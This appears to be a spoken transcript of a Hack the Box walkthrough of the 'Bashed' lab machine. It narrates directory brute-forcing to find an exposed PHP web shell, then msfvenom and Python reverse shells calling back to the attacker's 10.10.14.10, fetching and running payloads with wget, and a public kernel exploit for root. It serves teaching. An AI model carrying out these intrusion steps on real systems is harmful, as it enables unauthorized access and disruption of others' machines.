Hey everyone, welcome again to my tutorials here. We're going to be doing Hack the Box again, and this time we're going to be doing Bashed, which is actually the first machine that I ever did on this site. I'm actually recording this well after the fact, so this will also be, I think, the first machine that I'm actually able to post one of these tutorials on. I've recorded a few now, but since the machines aren't retired, I can't actually post them. So we'll see if I actually get around to putting this thing online. So to start out, take a look. Got our IP address again. I haven't actually connected yet, so let's just switch to my Dropbox and start a TMUX session. And then I'll go ahead and get connected, which I just have a little connect script for, and we'll open another pane here, and make a box or a directory for bashed. Oops. And we'll switch in here, and we'll start using this as our place to begin at. And as usual, we'll start with an Nmap, just a quick one. See what's running on the box. Looks like all it found was port 80. And then let's go ahead and start a more thorough one that we can have running in the background, where we'll scan all ports and we'll skip service detection and scripts, and I'll write it out to full scan in all formats. So basically OA will just tell it to write it out in Nmap and in greppable Nmap and in an XML format, and the P with the dash just tells it all ports. T5 is telling it to be pretty aggressive. If this was a real pen test, you might not want to do that. It's incredibly noisy, but in this case, it just makes it go faster. So we'll let that run. We'll open another pane for if we want to do some other stuff. In the meantime, let's pop open and see what is on that website. 68. PHP bash. Helps a lot with pen testing. I've tested it on multiple different servers and very useful, actually developed on this exact server. So that's probably a clue here that PHP bash, I assume, is a bash terminal written in PHP. The fact that he says he developed it on this exact server means that it's probably running around here somewhere. Looks like a lot of this stuff doesn't actually do anything yet. There's not a whole lot going on here. We could start trying to poke around, but we're probably not going to find anything. The best thing to do is open up DirBuster. There's also DirB, which is a command line tool that does the same thing. So we'll put in the IP address of our target. I'm going to go ahead and bump these threads up a bit so that it goes faster. Again, noisier, but as long as your connection supports it and you're not concerned with banging away at the web server. If there was a web application firewall or something, this may cause issues. And so now we want to get a word list, which are default end users share word lists, and there's a specific folder for DirBuster. Oops, that's not what you want to do. And we'll do directory list 2.3 medium. You can try all kinds of different ones. There's also a lot of lists that you can find online. SecLists has a ton of different word lists and things you can use for stuff like scanning directories or password cracking, other things. Perhaps I'll make a video at some point looking for stuff like that also, or showing how to use things like that. So we're getting a lot of hits right away. Got a single .html looks like it's got a screenshot of his terminal. And one thing we notice in here is there's an uploads php bash.php. So let's see. The IP address I noticed is also different though, but uploads php bash.php. Was it php bash or php bash? Okay. Not found on this server, so continue poking away. Okay, so we've got a dev folder and we've got a file called phpbash.php in there. That sounds more promising. phpbash.php. Okay, and so it looks like what we have here is a terminal or a PHP version of one. Let's see if this is running a real shell. Yeah, so it's running sh. And my assumption is that we can probably get the user token at least through here. Who am I? Okay, so we're dev data. So we're doing ls home. LA home. There's a folder called script manager and a folder called Araxel. And it looks like we've got read permissions in both of those directories. So let's just start at the bottom. Let's do a list in there. Script manager doesn't have anything super interesting. It's got bash history, but we can't read it. It's got bash log, bash rc, other things that may have something interesting, but for now we're not super concerned with. LSLA of Araxel's folder, and there's our user token. So if we do a cat home text, so we've got our user token. For those of you that don't know, since this is the first video that I'll be posting, presumably, oops, forgot that I'm in a browser. I will go ahead and mention some stuff that I wouldn't normally like on any of these challenges. If you haven't already noticed, all of the user tokens should be in some home folder under user.txt, and all the root ones will be in the root folder under root.txt, or in the case of Windows boxes will be in the administrator's desktop, which may not necessarily be the account named administrator, but a person with administrative privileges on their desktop, which some of them are tricky to find sometimes, but that's the general rule. So if you look hard enough, you can usually find what you're looking for. Okay, and so now that we've got the user token, we could try and see if we could, let's try real quick. Let's just do a vi.test. Yeah, and so this terminal, while it's useful for some of this stuff, and it looks like it's probably yeah, it's at least persistent, so we're not executing a shelling command and getting the result back. We're actually persisting our directory and stuff like that, which is good, but we can't do some interactive things like run vi. So we're going to want to get a shell that's a little more friendly. So there's a couple ways we can go about this. First, I'll show you the way that I don't typically recommend, at least for learning. It's fine for if you're just trying to do something real quick, although there's a huge caveat to that I'll mention in a second. But basically, this will show how to use the Metasploit framework to get a reverse shell. The reason I don't typically recommend that is there's a lack of secure or options to secure these shells. You can technically do it now. I won't cover how, but point being, if you did this on a pen test on a customer's real live server that's facing the internet, you may be opening a backdoor for all kinds of people to use. That's not recommended at all. I usually recommend that you roll your own and you do it in a way, or roll your own or find one that's secure. Something that isn't going to expose your clients to more threats than whatever they've already got because of whatever publicly facing services they have. So anyway, let's generate our payload here. I don't know why I opened a new terminal for that. So let's switch back into our proper directory. Okay. And what we'll use is msfvenom, which is a tool for generating payloads for Metasploit. And so -p is for payload. Sorry, I forgot we don't have tab completion here. And so we'll use Linux. And let's see real quick. LinEnum.sh. It's a 64-bit system, so let's use x64. And we'll use a shell. We could also use Meterpreter here, but again, I don't really want it for this case. I just want normal reverse shell. And we'll use a reverse TCP shell. We're going to need to set our L host, which is our local host. That's who it's going to call back to. And so in my case, it's 10.10.14.10. And we're going to set our L port. Again, make it anything you want. Sometimes you may have to choose this wisely if they're filtering outbound traffic. But on most of these systems, I haven't seen that. So we'll make it elite. And then format's going to be an ELF. And we're going to dump this to shell 64.elf. And a lot of these things, if your IP address isn't changing, you could make these ahead of time, have them ready to go. There's no need to generate them every single time unless one of these parameters changes. Okay, and so now we've got our shell underscore 64.elf. Now in order to use that, we're going to have to pop open the Metasploit framework and set it up to receive the reverse shell. Sorry, all these semi-transparent backgrounds kind of throw me off sometimes. So we'll do a use exploit, and we do have tab completion here, by the way, multi-handler. And so that's going to get us into the multi-handler. We're going to have to set the payload here. Set payload, and we're going to set it to the same payload we used above. So Linux. Tab completion's being a little slow. x64 shell reverse TCP. We're going to set our L host just the same as before, 10.10.14.10. We're going to set our L port 1337. We're going to set exit on shell to false, and then we will do exploit -j-e. And so now we've started a reverse TCP handler listening on our local host 10.10.14.10 port 1337. And so now we're ready to go as far as Metasploit's concerned. So what we need to do now is get our ELF file over to the remote system and get it executed. And so we can just do the simple trick of popping a Python simple HTTP server here. Port 80 is fine. And then we'll do let's see, first let's make a directory over here so we're a little bit sneakier as far as just, somebody's already been in there. So that we're not trampling on other people's stuff or leaving things out in the open. And so now in here, let's do a wget http ://10.10.14.10. I left it on 80, I guess. Shell 64.elf. Okay, so we got that. And ls, we see we have it. We're going to have to chmod it, give it execute permissions. Oops. By the way, we don't have tab completion in this either, so you got to type everything out. Oh, so there's a couple ways we can do this. We can either just chmod it like normal using the numeric values. We could probably also just do a bin bash to switch over to bash. Chmod plus x shell 64 elf. No, it's still not working. Go. Oh, so we didn't actually switch shells. That's fine. Chmod shell 64 elf. SLA. Okay, so now we can execute it. Shell 64 elf. And now if we go back to our Metasploit window, we see that we have now command shell session 1 opened. So we list our sessions, L. We have ours there. We can do sessions interact 1. So now let me minimize this so it's a little easier to see. Minimize this too. Okay. So now it looks like we've got our shell. We do. It's not super helpful. Let's turn this into a more complete shell by doing a simple little trick with Python. We're going to import pty. We're going to call pty.spawn bin bash. And you'll notice I used single quotes instead of here and double quotes outside. You can flip that around if you really wanted to, it doesn't matter. And so now we have a more complete shell. And as we can see, it's running bash. Okay, so now that we've done that, let's proceed with the tedious task of enumerating the system. And so you can do things like name-r, get the kernel version 440-62 generic. We could do uname so we see same basic information. We're running Ubuntu 64-bit. And so that's how you would do it with Metasploit. I'm actually going to back out of this before we start enumeration, just because I want to show you how to do it without Metasploit. And don't get me wrong, there's nothing wrong with Metasploit. It's a brilliantly written tool. I just think it's helpful to learn other ways to do these things first, and then if you still want to use Metasploit, go ahead. For a lot of these challenges, honestly, I use it because it's more convenient. So let's see here. Another way we can do this is with netcat. And so we can see if we have netcat on here. Let's see, we do. It doesn't look like it has the E option, so I believe it's older versions of netcat have a -E option that we can use to spawn a reverse shell directly. Since this doesn't have that, there's some tricks we have to play with creating FIFO and then tying the input and output. I'm going to skip that on this particular one just because I had already tried that before and it doesn't work on here. It doesn't work a lot of the time. Sometimes it does. There's another way we can do basically the same thing, and that's using Python, which we've already, I don't know that we have checked to see if we have Python-p. Yeah. Oh yeah, we know we have Python because I used Python to switch over to a bash shell in that previous example through Metasploit. So another trick we can play is using a socket in Python, and then what we do is we connect it back to a local listener, and we use the os dupe function to duplicate the sorry, I pulled a blank there for a second, to duplicate our file handles for our input, output, and standard error, and then we'll shell a bash session with it also. And so what that'll basically do is tie that remote bash session to that socket, which is going to be sent back to us here, and we'll listen for with netcat. So if we do an nc-l, and we'll listen on whatever port. Oh, sorry, let's do a netcat-l. And so now we're listening. And then I'm actually going to, let's see here, let's get the command for doing this from my GitHub. You can find these commands all kinds of places. The reason I'm pulling it and copying it rather than just typing it out for you is because it's really long and kind of a pain in the ass. Oh, maybe I don't have it public. Okay, well that's fine. Let's see, we can probably search for it instead. Python reverse shell. So I believe both Pentest Monkey and High on Coffee should have it. Yeah, so this is basically what we're going to want to do here. So we're importing socket and subprocess. We're creating a socket, connecting back to ourselves. We're duplicating the file descriptors for our socket and for standard in, out, error. And then we're doing a subprocess call, and we're starting a shell. I'm going to actually do bash instead. And I've got one here that I can just copy and paste it as the right IP address, but it's basically this exact same code. And so we've got our netcat listening over here, and we're going to want to paste this into here. So you can see the big long string. And then if we come back here, I don't think that worked. Oh, that's my fault. I left a quote out, which it looks like in this case it didn't like, so let's try that again with all the proper characters. Okay, and as you can see, we are now in the same place we were with Metasploit, and we've got our bash shell, and life is happy. So, next thing to do is enumerate, and enumerating is sometimes considered the boring part. It's honestly something you should get used to, get good at, because it is always what helps. The chances of just kind of randomly poking and finding something are fairly low. On this one, let's just go drop back a couple of directories, scripts. And so I just have a scripts folder where I keep a bunch of junk, like LinEnum and linprivchecker.py. Those are both standard, easily available on the internet scripts that do enumeration on Linux systems. We'll do the typical Python, simple server 8080, or 80, because we're using 8080 for our reverse shell. And so we'll pull that LinEnum script down. And wget and same thing, we'll make it executable. This time we should be able to just add that. Okay, so now it's pulled down, it's executable. We can run it. And so this is going to go through, do a bunch of tests that we could manually do, create a nice automated output. Makes life a lot simpler. So if we scroll back up to the top, somebody's been playing, oh, there's a ton of them are mine. Huh. Not sure why I've got so many connections to that system that are, oh, yes I do, yes I do. Let's go ahead and kill DirBuster since we're in here. That is because DirBuster is being noisy, and that's kind of what I was saying before about how you don't want to be running a million threads or Nmap at full blast unless you want to show up like that. If any administrator was to look at the sockets that were open on the system, it's a huge red flag because there's miles and miles of connections open from the same machine. So that's actually a good demonstration, I suppose. So let's take a look here. So it's Ubuntu 16.04.2 LTS. We already knew the kernel version. And so now we're just going to look and see if there's anything that stands out. Looks like we can sudo without supplying a password for a few commands. And script manager doesn't need a password at all, just sudo. Nothing super interesting, at least that I've seen. It's possible I missed something there. That's the other thing to note on a lot of these boxes is there's more than one way in. If you watch a lot of people's videos when they do tutorials on these, you'll see that sometimes they take slightly different paths. It's because since these are real systems, the ways in can often be more than just what the author intended. That's one of the reasons I like Hackthebox.eu over some of the other places that I've used before where the challenges are more contrived. You're not actually trying to hack a real system. Instead, you're trying to match some regex filter that's looking to see if you type some exact command. So while those are still useful, you still learn they're not quite the same since they're not live systems. So we got a bunch of network connections here. This actually makes it a little messier to look. Sometimes you see interesting things in the netstat window. But in this case, because some sloppy bastard left a ton of threads running, it's polluted with a bunch of half-open connections. So we can actually see here where we created our shell. And this actually becomes pretty visible to anybody that was looking on the system. So again, this is not the stealthiest way to do things. And so I don't see a whole lot that looks super interesting here. There's a sendmail.php file, which maybe would be interesting to take a look at. We can read and write some sensitive files. We can read the password file, which isn't a whole lot of help other than seeing what other systems or users are on the system, which has already been enumerated up above, by the way. We can't read the shadow file. There's a bunch of configuration files on here. We can read all of them, it looks like. So taking a look through those, sometimes you'll find usernames or passwords that have been configured. So first things first on these type of boxes, I like to look and see what we have for kernel exploits. So exploit exploit.db, you'll usually find several exploits. So it looks like we've got a decent amount. Okay, so yeah, this is one that gives you a local privilege escalation based on kernel address space layout randomization. Issues, let's see. Now, an important thing to point out here, some of these exploit proof of concepts that people post are not the most stable things in the world, and they will crash the box. In these challenges, it's not a big deal. You just request a reset, wait a couple minutes, things are back up. You want to keep that in mind if you were actually doing a real pen test, especially if you're trying to not disrupt their service too much. You might not want to be just spamming random proof of concept code that you find online. And so, actually, I think I recognize that code, and let's see, there's actually two different versions of code. Let's see, so this is a double free. Yeah, so this one actually is some proof of concept code that is fairly unstable. I've ran this a number of times on different boxes, and it often ends up in the system being crashed. And so we'll go ahead and, actually I don't think I want to try that one. And with that one, so as you can see, there's not a shortage of options to try. So this is again for a different CVE. It may be good. In fact, here we can go ahead and try it. Some of these I haven't had as much luck with. Oh, actually, let's take a look here real quick. We might not even be on the list of, yeah, we're not on the list of kernels that it'll work with, so it's probably going to give us an error, so let's not waste any time compiling that. So this one's for 6074, so this is the one that I was looking at before. This is actually a different version of the code though, so this one's not, I haven't had as many problems with this one crashing the system. So what you'll want to do is take this code. You could clone the Git repository also. There's no need to manually copy and paste, but in this case, I find it easier. So let's save this to bash. And I personally, this is all a matter of taste, I personally like to name stuff like this after the CVE because it makes it easier to find. If I give it a cutesy name, it sometimes becomes a little more confusing to me on which one it is. Oops, sorry, there shouldn't be a dash in there. So we'll save that. There's a few exceptions to that. Dirty Cow is one that I use a lot on Linux systems, and I generally call it Dirty Cow because, or Cow, just because it's easy to remember. But with the exception of the ones with cutesy names, which these days I suppose is more and more, but I won't get started on that. So let's compile this. Again, in real life, you would probably not want to give it a name of a CVE. You might want to give it something a little less conspicuous, but server port 80. So now that's running. So let's pull it down. Get 1410. Oh, did I say 80? Yeah, it's port 80. CVE 2017, the 6074, I think. Okay, so we got it down. Now we just make it executable. And then let's see if we blow the system up. First thing. Huh, didn't work. Let's take a quick stab at running it. 6074 and see if the world ends. Inappropriate opt over this device, bash no jobs. That's fine, that's our normal message because of the way that we're getting our shell here. And if you actually notice, and sorry, I just pointed at that on the screen, which you obviously can't see. We're running as root now. So if we do it, who am I? We're root. So our exploit did work. I recommend quickly going and, sorry, root.text. So I recommend quickly getting things because these exploits do have a tendency to be fickle and cause the system to crash. And it looks like that may be what has happened here. So the party isn't necessarily over yet, but we may have to restart. Let's go ahead and kill that. So we're dropping out. Let's listen on 8080 again. Let's see if we can get away with just running our code to get us a show. Yeah. We have killed the box. And so that is actually what I was referring to with saying that sometimes they're not the most reliable thing. I'm going to go ahead and pause this video while we're restarting just so you don't sit here for 2 minutes listening to me babble. And then I'll be right back. Okay, and so it should be back up now. Let's get this back into a state where we're ready for the connection. Luckily, since this is a web browser, it actually still has our previous commands in there, so we should just be able to send it again. Keeping in mind that, there we go. Keeping in mind that we are now reset, so everything that we had staged in our temporary directory, since it was in dev.shm, which is a RAM disk, it's no longer there, which is fine. Means less to clean up. Get this stuff set up again really fast. Still got that running, which is good. So we'll re-download our exploit. While we're doing all this, this time. It's possible last time too. This one's generally more reliable than the other one that I showed you on there, but if somebody had already owned this box, which it looks like they did because there were some old directories left around, it's possible that their exploit was still running and things get messy as you have multiple of these running. And once the old one gets killed, it crashes the system most of the time. Same as this one will crash the system. So actually, after I'm done, I will reset the box so that the next person doesn't have to deal with it. And so there we go. Got the root token also. So that's it. We've got both tokens. As always, remember to clean up your mess. In this case, I'm just going to do a simple reset because of the fact that I ran an exploit that is still running in the background and will create an unstable system when it gets killed or if other things happen. So let's just request another reset. If people cancel it a bunch, then I suppose that's that. But for now, let's do an rm -r.temp, clean out our directory, which it looks like we're actually already in a crashed state, so it doesn't matter. So that's about it. That gets you on. Get your user and root flags. I'm sure there's a bunch of other ways to do this. I'm actually looking forward to being able to watch IppSec's take on this box, which is due to be retired tomorrow around noon, I think. And so then I'll actually be able to post this video, which it probably won't be posted at that point because I'm not really feeling the editing today. But it'll be posted at some point. I highly recommend watching IppSec's videos. They're some of the first videos I watched when I started to get into this stuff. And they're invaluable. He's an incredibly talented person. He's got all kinds of tips and tricks that are great. I recommend taking a ton of notes because there's a lot of stuff that he covers. And with all of this stuff, anything you learn on one box is likely applicable to all kinds of other boxes. And part of it too is just a pattern of thinking, and so learning to think in certain ways is always valuable. So just soak up whatever you can. Get out there and try it. I know a lot of people have been talking to me about doing challenges on this site, but they don't know how to get started. They don't know what to do first. It's kind of intimidating sometimes, especially if you don't know where to start. I know plenty of people that know all kinds of things about computer security, vulnerability research, reverse engineering, but they don't know where to start poking the holes. I mean, simple things like DirBuster, knowing how to run them. If you didn't know how to enumerate the website like that, you just sit there plugging away at random things, maybe guessing phpbash.php, you wouldn't find anything. Maybe you would think of doing /dev, probably not though. Point being, a lot of the time just learning how to use the tools is invaluable. And there's no better way for me to learn how to use tools than to watch other people's tutorials and watch how they went about doing it. There's also reading tutorials, of course. I personally find watching them more valuable, which is why I'm trying to start doing videos. I'll also probably end up doing a write-up on my blog, which I'll post a link to with this video, so if you prefer to read about it. But yeah, that's it. So thanks for watching. Hopefully it wasn't too boring. And I'll see you on the next one that I'm able to post.